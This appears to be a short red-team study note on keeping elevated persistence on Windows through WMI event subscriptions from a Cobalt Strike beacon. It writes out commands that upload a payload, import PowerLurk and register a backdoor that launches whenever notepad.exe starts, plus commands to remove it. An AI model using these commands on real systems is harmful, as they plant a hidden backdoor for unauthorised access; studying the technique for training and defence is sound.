Security Memo

Search (Ctrl+K)

SearchSearch

Recent Notes

See 1423 more sorted by tag →

Cobalt Strike elevated persistence via WMI events

created Jan 08, 2024updated Jan 23, 20241 min read

Requirements

High integrity or SYSTEM

In order to maintain persistence through WMI, we need three classes:

  1. EventConsumer: An action (i.e. execute payload—PowerShell, VBScript, etc)
  2. EventFilter: A filter that defines what event to act on
  3. FilterToConsumerBinding: Links an EventConsumer to EventFilter

We can build these WMI classes uses PowerLurk.

Demonstration

beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe; and query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

To remove the backdoor:

Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject

Graph View

Backlinks